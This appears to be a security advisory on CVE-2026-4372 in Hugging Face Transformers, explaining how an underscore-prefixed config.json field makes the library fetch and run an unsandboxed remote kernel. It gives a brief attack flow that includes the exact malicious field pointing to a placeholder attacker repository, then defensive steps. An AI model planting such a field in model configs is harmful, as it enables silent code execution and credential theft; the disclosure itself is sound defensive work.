Pluto Security researchers disclosed CVE-2026-4372, a remote code execution vulnerability in Hugging Face Transformers versions 4.56.0 through 5.2.x. A single innocuous-looking parameter in a model's config.json bypasses the trust_remote_code=False safety flag and executes attacker-controlled code silently during model loading. The library has 2.2 billion cumulative installs. Patch to 5.3.0 immediately.

The Scale of the Problem

The Hugging Face Transformers library is the backbone of the ML ecosystem — used to load, run, and fine-tune over 1 million model variants. With 146 million monthly PyPI downloads and 161K+ GitHub stars, it's present in virtually every enterprise ML pipeline, research environment, and AI-powered product.

CVE-2026-4372 was silently patched in Transformers 5.3.0 (released March 3, 2026), but it affects every version from 4.56.0 onward. Vulnerable versions are still being downloaded 7 to 8 million times per week — roughly one quarter of all weekly installations.

Metric Value
Cumulative installs 2.2 billion+
Monthly PyPI downloads 146 million
Vulnerable version weekly downloads 7–8 million
Affected version range 4.56.0 – 5.2.x
Patched version 5.3.0 (March 3, 2026)
CVE ID CVE-2026-4372
Severity High

How the Attack Works: Three Design Flaws Combine

No single bug enables this exploit. It's the combination of three independent design decisions that creates the vulnerability.

Step 1: Unfiltered setattr on model loading

When you call AutoModelForCausalLM.from_pretrained("model-name"), the library downloads the model's config, weights, and tokenizer from the Hub and applies every parameter in config.json to the model object via setattr — without filtering internal or private fields.

Step 2: Unprotected _attn_implementation_internal parameter

This internal parameter controls which attention mechanism the model uses (Flash Attention, SDPA, or the default eager implementation). Because it's applied via the unfiltered setattr, an external config.json can set it to any value.

Step 3: Unsandboxed kernel loader

hub_kernels.py checks _attn_implementation_internal. If the value matches the pattern owner/repository, it downloads that kernel from the Kernels Hub and executes it without sandboxing.

Attack flow:
1. Attacker uploads malicious kernel to their HuggingFace repo
2. Attacker adds to model config.json:
   "_attn_implementation_internal": "attacker-org/malicious-kernel"
3. Victim loads the model — malicious code executes silently

The trust_remote_code=False flag — the standard safety control users rely on — provides no protection here.

Immediate action checklist: 1) Upgrade: pip install --upgrade "transformers>=5.3.0", 2) Search all cached config.json files for _attn_implementation_internal, 3) Rotate cloud credentials, API tokens, and SSH keys as a precaution if you've loaded any untrusted models recently.

Why GPU Environments Are Most at Risk

The exploit requires the kernels package to be installed — technically an optional dependency. But here's the problem: any developer who wants GPU-accelerated inference installs it. Enterprise ML platforms and GPU clusters routinely install all optional dependencies to maximize hardware utilization.

As the Pluto Security researchers put it: "Users who work with GPU-accelerated inference — arguably the most valuable targets — are the most likely to have it installed."

What Attackers Can Steal

Asset Category Examples
Cloud credentials AWS, GCP, Azure access keys
AI/ML API keys OpenAI, Anthropic, HuggingFace tokens
CI/CD pipeline secrets GitHub Actions, GitLab CI credentials
Infrastructure access SSH keys, Kubernetes configs, Vault tokens

Recent context: One month before this disclosure, a malicious HuggingFace repository impersonating a new OpenAI Privacy Filter model release reached the #1 trending spot on the platform within 18 hours and was downloaded 244,000 times before removal. AI model supply chain attacks are no longer theoretical.

Defense Recommendations

Pluto Security and Hugging Face recommend:

  1. Upgrade to Transformers 5.3.0 immediately — the patch is available now
  2. Audit cached models — search all local config.json files for _attn_implementation_internal
  3. Sandbox model loading — run model loading inside isolated containers without host credential access or unrestricted network egress
  4. Scan configs before loading — check for unexpected fields, especially those prefixed with underscore, before loading any model configuration

Key Takeaways

  • CVE-2026-4372 enables RCE via a single config.json field, bypassing trust_remote_code=False
  • Affects Transformers 4.56.0–5.2.x; patched in 5.3.0 (released March 3, 2026)
  • Vulnerable versions still downloaded 7–8 million times per week
  • GPU inference environments — enterprise ML platforms and GPU clusters — are the highest-risk targets
  • Upgrade immediately + audit cached configs + rotate credentials

CVE-2026-4372 is a reminder that the AI supply chain attack surface extends well beyond package registries into model repositories, configuration files, and inference infrastructure. The exploit is trivial to execute, the blast radius is enormous, and the patch is already available. There is no reason to remain on a vulnerable version.